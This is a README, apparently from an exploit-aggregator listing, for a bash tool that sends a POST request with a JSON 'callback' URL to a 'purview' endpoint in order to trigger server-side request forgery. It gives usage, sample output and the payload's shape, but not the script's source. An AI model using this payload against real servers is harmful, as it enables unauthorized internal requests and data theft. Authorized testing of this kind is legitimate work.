Share
## https://sploitus.com/exploit?id=D1821C57-9D8B-5E8D-92D8-1CF9328514A3
# SSRF Exploit Script

This repository contains a script designed to perform an SSRF (Server-Side Request Forgery) exploit for testing and educational purposes. **Use this tool responsibly and only in environments where you have explicit permission.**

## Features
- Exploit SSRF vulnerabilities in target systems.
- Validate input URLs to avoid misuse.
- Easy-to-use CLI interface with clear error messages and help menu.

## Requirements
- `bash` (Unix shell)
- `jq` (JSON processor)
- `curl` (Command-line tool for HTTP requests)

## Usage

### Syntax
```bash
./script.sh --exploit <target_url> <purview_url>
```

### Options
| Option             | Description                                      |
|--------------------|--------------------------------------------------|
| `-h`, `--help`     | Show the help menu.                             |
| `--exploit` `tu pu`| Perform the SSRF exploit with target and purview URLs. |

### Examples

#### Show Help Menu
```bash
./script.sh -h
```

Output:
```
Usage:
./script.sh --exploit <target_url> <purview_url>

Options:
-h, --help       - Show this help menu
--exploit <tu> <pu> - Perform the SSRF exploit with target and purview URLs
```

#### Perform SSRF Exploit
```bash
./script.sh --exploit http://example.com http://purview-url.com
```

Expected Output:
- If successful:
  ```
  SSRF exploit successful! Data retrieved:
  <response data>
  ```
- If unsuccessful:
  ```
  SSRF exploit failed! HTTP code: <code>
  ```

## Script Workflow
1. The script parses the provided arguments.
2. Validates the provided URLs for correctness.
3. Sends an HTTP POST request with a JSON payload to the `purview_url`, attempting to exploit an SSRF vulnerability.
4. Prints the HTTP response or an error message based on the result.

## Example Workflow
### Input
```bash
./script.sh --exploit http://callback-url.com http://vulnerable-purview-url.com
```

### Payload Sent
```json
{
  "callback": "http://callback-url.com"
}
```

### Response Handling
The HTTP response code and body are saved, and based on the status code, the success or failure of the exploit is determined.

## Error Handling
- If invalid or missing arguments are detected, the script provides detailed instructions via the help menu.
- If URLs are malformed, an error message is displayed, and the execution stops.

## Development Notes
This script is for testing purposes only. Misuse of this script can lead to severe legal consequences. Ensure compliance with all applicable laws and ethical standards.

## Contribution
Feel free to contribute by creating pull requests or reporting issues.

## License
[GNU GPL v3](LICENSE)

---

### Disclaimer
**This tool is intended for educational purposes and authorized penetration testing only.** The author is not responsible for any misuse or damage caused by this tool.